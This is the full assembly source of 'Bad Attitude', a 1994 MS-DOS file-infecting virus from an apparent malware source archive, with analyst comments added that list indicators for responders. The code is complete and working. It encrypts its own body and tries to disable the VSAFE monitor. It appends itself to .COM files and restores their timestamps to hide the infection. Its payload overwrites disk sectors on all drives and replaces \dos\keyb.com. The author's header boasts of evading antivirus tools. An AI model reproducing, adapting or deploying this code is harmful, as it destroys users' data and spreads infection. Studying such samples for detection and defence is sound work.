MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.badattit.asm
2021-01-12 17:31:39 -06:00



; -Bad Attitude-
; "Created by Immortal Riot's destructive development team"
; (c) '94 The Unforgiven/Immortal Riot
;
; "If I don't have bad attitude, this virus is harmless"
;
; Notes:
; F-Prot, Scan, Tbav, Findviru can't find shits of this virus.
;
; Disclaimer:
; If this virus damages you, it's a pleasure, but not the fault
; of the author. If you want to sue me, it's your loss.
;
; Dedication:
; I dedicate this virus to all virus writers worldwide!
.MODEL TINY
.CODE
ORG 100h
; Entry stub: issues an INT 16h request aimed at a resident AV monitor,
; computes the load-address delta into BP, then runs the XOR routine over
; the body before continuing at Real_code_start.
; Analyst note: En_de_crypt only processes Real_code_start..virus_end, so
; everything from Virus_start up to Real_code_start is written to infected
; files in clear and stays constant apart from encryption_value.
Virus_start:
xchg ax,ax
xchg ax,ax ; Take down VSAFE from memory!
; The author's comment above describes the INT 16h call below. The register
; pair AX=FA01h / DX=5945h ahead of INT 16h is a recognisable cue in itself.
mov ax,0fa01h
mov dx,5945h
int 16h
call get_delta_offset ; pushes the run-time address of Get_delta_offset
real_start:
Get_delta_offset: ; Get delta offset
pop bp ; BP = run-time address of this label
sub bp, offset get_delta_offset ; BP = run-time minus assemble-time address
Call_en_de_crypt:
; A return address is pushed by hand so the RET at the end of En_de_crypt
; resumes at BP+11Ah. The constant is hard-coded, so it depends on the exact
; byte layout; presumably it is the second JMP below (confirm against an
; assembled listing).
mov ax,bp
add ax,11Ah
push ax
jmp short en_de_crypt ; First, decrypt the virus
jmp short real_code_start ; and then, continue!
; XOR key word. It sits before Real_code_start, i.e. outside the processed
; range, so it is stored unencrypted. The initial value 0 makes the XOR pass
; a no-op on the unencrypted first generation.
encryption_value dw 0 ; Random value for each infection!
; Write_virus: appends the body to the file whose handle is in BX.
; In:  BX = open file handle (file pointer positioned by the caller),
;      BP = delta offset, encryption_value already set.
; The in-memory copy is XORed, written with DOS function 40h, then XORed
; again so the running copy can carry on executing.
Write_virus:
call en_de_crypt ; Encrypt the virus
mov ah,40h ; DOS: write to handle
mov cx, offset virus_end-100h ; length = whole image from 100h to virus_end
lea dx, [bp+100h] ; source = run-time start of the image
int 21h
call en_de_crypt ; Decrypt the virus again
ret
; En_de_crypt: XORs every word from Real_code_start to virus_end with the
; 16-bit value in encryption_value. XOR is its own inverse, so the same
; routine both encrypts and decrypts.
; In:  BP = delta offset.  Clobbers: AX, CX, SI, flags.
; Analyst note: a fixed-key word XOR over a fixed-length region means the
; body of every sample differs only by the key stored in encryption_value.
En_de_crypt:
mov ax,word ptr [bp+encryption_value] ; AX = key
lea si,[bp+real_code_start] ; SI = first word to process
mov cx,(virus_end-real_code_start+1)/2 ; word count, rounded up
Xor_LoopY:
xor word ptr [si],ax
inc si
inc si ; advance one word
Loop Xor_LoopY
ret
; Payload trigger, keyed on the hundredths-of-a-second field (DL) returned
; by DOS Get Time (function 2Ch):
;   DL = 0 -> Create_file is called (replaces \dos\keyb.com)
;   DL = 1 -> the name string is printed and the sector-overwrite loop runs
;   else   -> straight to the infection logic at Not_this_time
; Impact note: the DL = 1 branch issues INT 26h (DOS absolute disk write),
; so the damage is to raw sectors and is not undone by removing the virus.
Real_code_start:
mov ah,2ch ; Get Time
int 21h
cmp dl,0 ; 1%
jne Another_Percent
call Create_file
Another_Percent:
cmp dl,1 ; another %
jne not_this_time ; Naaaaaaah
mov ah,09h ; Print the virus name
lea dx,[bp+virus]
int 21h
Trash_sucker: ; Overwrite all sectors on all drives!
mov al,2h ; on drive C - Z
Drive:
mov cx,1 ; one sector per call
lea bx,virus ; BX = source buffer offset for the write
cwd ; DX = 0 (sign extension of AX): start at sector 0
Next_Sector:
int 26h ; DOS absolute disk write
inc dx ; next sector number
jnc next_sector ; INC leaves CF alone, so this tests INT 26h's result
inc al ; on error move to the next drive number
jmp short drive ; unconditional: no exit from this loop is visible here
; Host set-up and target search.
; - Moves the DTA to the memory just past virus_end, so the find-first
;   record (attribute at +15h, time +16h, date +18h, size +1Ah, name +1Eh)
;   is addressed later as [bp+virus_end+N].
; - Copies the 4 saved host bytes from first_bytes to @buf before
;   first_bytes is reused as a read buffer.
; - Does nothing further when run from drive A: or B:.
; - Searches *.COM in the current directory, then walks up with "..", and
;   finally tries \dos once (dosflag records that attempt).
Not_this_time:
cld
Set_Dta: ; Set the dta
mov ah,1ah
lea dx,[bp+virus_end]
int 21h
Buffer_Xfer: ; Restore the beginning
lea si,[bp+first_bytes]
lea di,[bp+@buf]
mov cx,2 ; 2 words = 4 bytes
rep movsw
mov di,3 ; Infection-counter
Get_drive: ; Get drive from where we're
mov ah,19h ; executed from
int 21h ; AL = current drive (0 = A:, 1 = B:, 2 = C:)
cmp al,2
jae Get_Dir ; A: or B:, if so, don't infect
jmp restore_start ; other programs! Just return normally!
Get_dir: ; Get directory from we're executed
mov ah,47h ; from!
xor dl,dl ; DL = 0: default drive
lea si,[bp+dirbuf+1] ; stored after the leading "\" kept in DIRBUF
int 21h
Find_First: ; Find first file
mov cx,111b ; attribute mask: read-only, hidden and system included
lea dx,[bp+filemask]
mov ah,4eh
_4fh: ; When called ah=4fh
int 21h
jnc clear_file_attribs ; We did find a file!
chdir: ; We didn't find a file,
cmp byte ptr [bp+DOSflag],1 ; \dos already tried? then give up
jne dot_dott
jmp no_more_files
dot_dott:
mov ah,3bh ; so we try in another dir!
lea dx,[bp+offset dot_dot]
int 21h
jnc find_first
mov ah,3bh ; We try to infect files in
lea dx,[bp+offset DOS] ; \DOS
int 21h
inc byte ptr [bp+dosflag] ; INC does not change CF, so JNC still sees the chdir result
jnc find_first
jmp no_more_files
; Infection of one candidate file (name taken from the DTA at +1Eh).
; Sequence: clear attributes, open read/write, read the first 4 bytes,
; apply the skip checks, overwrite the first 4 bytes with NOP + near JMP to
; the old end of file, pick a new XOR key, append the body.
; Indicators for responders, all visible in this block:
;   - an infected .COM starts with the bytes 90h E9h (word 0E990h), which
;     is also the marker the code uses to skip files already infected;
;   - the file grows by the length of the appended body;
;   - only files between 400 and 64000 bytes that are not MZ/ZM executables
;     are modified.
Clear_file_attribs: ; Clear file attribs
mov ax,4301h
sub cx,cx ; CX = 0: no attributes
lea dx,[bp+virus_end+1eh] ; DTA file name
int 21h
Open_file: ; Open the file in read/write mode!
mov ax,3d02h
int 21h
xchg ax,bx ; BX = file handle for the calls below
Read_file: ; Read the first four bytes of the file
mov ah,3fh
mov cx,4
lea dx,[bp+first_bytes]
int 21h
Check_already_infected: ; and check if it's already infected
mov si,dx
lea si,[bp+first_bytes]
cmp word ptr [si],0e990h ; 90h E9h = infection marker
je already_infected
cmp word ptr [si],5a4dh ; or an EXE file?
je already_infected
cmp word ptr [si],4d5ah ; or an EXE file?
je already_infected
mov ax,word ptr [bp+virus_end+1ah] ; or smaller than 400 bytes?
cmp ax,400
jb already_infected
cmp ax,64000 ; or bigger than 64000 bytes?
ja already_infected ; if so, don't infect it!
Move_file_pointer_2_EOF:
call F_Ptr ; Move file-pointer to end of file
sub ax,4 ; AX = file length - 4 = displacement for the 4-byte NOP/JMP header
Fill_1st_buf:
mov word ptr [bp+Istbuf],0e990h ; Fill the four bytes
mov word ptr [bp+Istbuf+2],ax ; with our own jmp construction!
_TopOfFile: ; Move file-pointer to
mov ax,4200h ; the beginning of file!
int 21h ; CX:DX are still 0 from F_Ptr
Write_first4: ; Write our own jump instruction
mov ah,40h
mov cx,4
lea dx,[bp+Istbuf]
int 21h
_EOF: ; Move to end of file again
call F_Ptr
Get_random: ; Get a random value
mov ah,2ch
int 21h
add dl, dh ; mix seconds into hundredths; retry while the sum is zero
jz get_random
mov word ptr [bp+encryption_value],dx ; put it as the encryption value
call write_virus ; infect the file
jmp short restore_time_date ; Then cover our tracks!
; Per-file clean-up, loop control and return to the host.
; - Skipped files bump DI first so the DEC below does not count them.
; - Time/date (DTA +16h/+18h) and attributes (DTA +15h) are written back,
;   so timestamps and attributes of an infected file are not reliable
;   indicators; compare file size and leading bytes instead.
; - After three infections, or when no more files are found, the saved host
;   bytes are copied back to 100h and control returns to the host.
Already_infected:
inc di
Restore_Time_Date: ; Restore the infected file time
lea si,[bp+virus_end+16h] ; and date stamps
mov cx,word ptr [si] ; CX = time
mov dx,word ptr [si+2] ; DX = date
mov ax,5701h
int 21h
Close_file: ; Close the file!
mov ah,3eh
int 21h
Set_old_attrib: ; Set back old attribs!
mov ax,4301h
xor ch,ch
mov cl,byte ptr [bp+virus_end+15h]
lea dx,[bp+virus_end+1eh]
int 21h
Enough_files: ; Have we infected
dec di ; 3 files this run?
cmp di,0
je no_more_files
mov ah,4fh ; No, then, search for the next file!
jmp _4fh
No_more_files: ; We've infected enough!
Restore_start:
lea si,[bp+@buf] ; 4 host bytes saved by Buffer_Xfer
mov di,100h ; start of the COM image
movsw
movsw
Restore_dir: ; Restore the directory to
lea dx,[bp+dirbuf] ; from where we were
mov ah,3bh ; executed from!
int 21h
Exit_proc: ; and then return to the
mov bx,100h ; real-file!
push bx
xor ax,ax
retn ; near return to the pushed 100h
; F_Ptr: seek to end of file on handle BX (DOS function 42h, origin 2,
; offset 0).
; Out: DX:AX = new file position, i.e. the file length; the callers use AX.
; Leaves CX = 0.
F_Ptr: ; Move the file-pointer to end of
mov ax,4202h ; file! (used twice!)
xor cx, cx
xor dx, dx
int 21h
ret
; Create_file: creates (or truncates) the path in `filename`, \dos\keyb.com,
; and writes the `len` bytes starting at `scroll` into it.
; Impact note: the original KEYB.COM is lost; a \DOS\KEYB.COM whose content
; is the short scroll program (it carries the text "ImmortalRiot") is an
; indicator that this branch ran.
Create_file: ; Create a new \dos\keyb.com
Mov ah,3ch ; DOS: create or truncate file
mov cx,0 ; normal attributes
lea dx,[bp+filename]
int 21h
Write_Da_File:
xchg ax,bx ; BX = handle returned by the create call
mov ah,64d ; 64 decimal = 40h: write to handle
mov cx,len
lea dx,[bp+scroll] ; Write new content in the file
int 21h
Close_Da_File: ; Close the trojanized file
mov ah,3eh
int 21h
ret ; and continue..
scroll db "<22><>$<0F><03>R<><52><02><10>O<00><00>",1ah," <09>"
scrol1 db " <20>Q<>8",0ffh,"<22><>Y<EFBFBD><02>z<01>!<21>{<01>!<21>|<01>!<21>}<01>!<21>~<01>!<21><01>!<21><16><01>!<21><16><01>!<21> <20>!<21><16><01>!<21><16><01>!<21><16><01>!<21><16><01>!<21> <20>!O<><4F>ImmortalRiot "
len equ $-scroll
virus db '[BAD ATTITUDE!]$'
copy db "(c) '94 The Unforgiven/Immortal Riot"
Filemask db '*.COM',0
Dot_dot db '..',0
dos db '\dos',0
filename db '\dos\keyb.com',0
Buffers:
First_bytes db 90h,90h,50h,0c3h ; Our own little jmp constrution!
@buf db 4 dup(0) ; Empty space to be
Istbuf db 4 dup(0) ; filled with instructions
DIRBUF db "\"
Junkie:
db 64 DUP(0)
dosflag db 0
virus_end:
end virus_start
; ------------------------------------------------------------------------------
; Here is the nice pay-load (read:scroll) in the Bad Attitude virus.
.model tiny
.code
org 100h
; Ssscroll: stand-alone source of the screen payload that Create_file drops
; as \dos\keyb.com. It positions the cursor, then loops forever drawing one
; character through the BIOS and printing the letters stored at `heap`
; ("Immortal Riot ") through DOS.
; There is no exit path in this code; per the author's comment it runs
; until Ctrl+Break.
Ssscroll:
mov al,dl
and al,15 ; AL = low 4 bits of the entry value of DL
mov ah,3 ; BIOS: read cursor position
int 10h
push dx
mov dh,al ; row = the masked value, presumably preserved across INT 10h
xor dl,dl ; column 0
mov ah,2 ; BIOS: set cursor position
int 10h
mov di,79
mov cx,1 ; repeat count for the write-character call below
arrow:
mov ax,91Ah ; AH=09h write character+attribute, AL=1Ah character
mov bl,10 ; attribute value
int 10h
DELAY:
push cx
mov cx,-200 ; 0FF38h iterations
rep lodsb ; loads are discarded: used only as a busy-wait
pop cx
mov ah,2 ; DOS: display the character in DL
mov dl, I
int 21h
mov dl, M
int 21h
mov dl, M2
int 21h
mov dl, O
int 21h
mov dl, R
int 21h
mov dl, T
int 21h
mov dl, A
int 21h
mov dl, L
int 21h
Space:
mov dl, ' '
int 21h
mov dl, R2
int 21h
mov dl, I2
int 21h
mov dl, O2
int 21h
mov dl, T2
int 21h
mov dl,' '
int 21h
dec di ; DI is decremented but never tested
jmp arrow ; Loop until a ctrl+break is pressed!
heap:
I db 'I' ; Immortal Riot
M db 'm'
M2 db 'm'
o db 'o'
R db 'r'
T db 't'
A db 'a'
L db 'l'
R2 db 'R'
I2 db 'i'
O2 DB 'o'
T2 DB 't' ; Is here to stay!
a13 db ' '
end Ssscroll